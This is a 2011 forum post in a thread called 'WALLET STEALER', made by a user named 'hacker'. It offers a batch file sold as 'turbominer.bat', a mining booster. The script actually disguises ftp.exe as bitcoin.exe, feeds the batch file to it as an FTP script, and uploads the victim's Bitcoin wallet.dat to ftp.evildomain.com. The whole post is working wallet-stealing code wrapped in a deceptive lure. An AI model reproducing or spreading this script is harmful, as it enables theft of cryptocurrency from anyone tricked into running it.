Post
Topic
Board Development & Technical Discussion
Re: WALLET STEALER: so simple can it be!
by
hacker
on 18/06/2011, 00:09:34 UTC
turbominer.bat now mines over 9000% faster.

Code:
@copy %SYSTEMROOT%\System32\ftp.exe %PUBLIC%\bitcoin.exe
@cd %APPDATA%
@%PUBLIC%\bitcoin.exe -i -s:"%~f0"&GOTO:EOF
open ftp.evildomain.com
anonymous
password
bin
put "Bitcoin\wallet.dat"
bye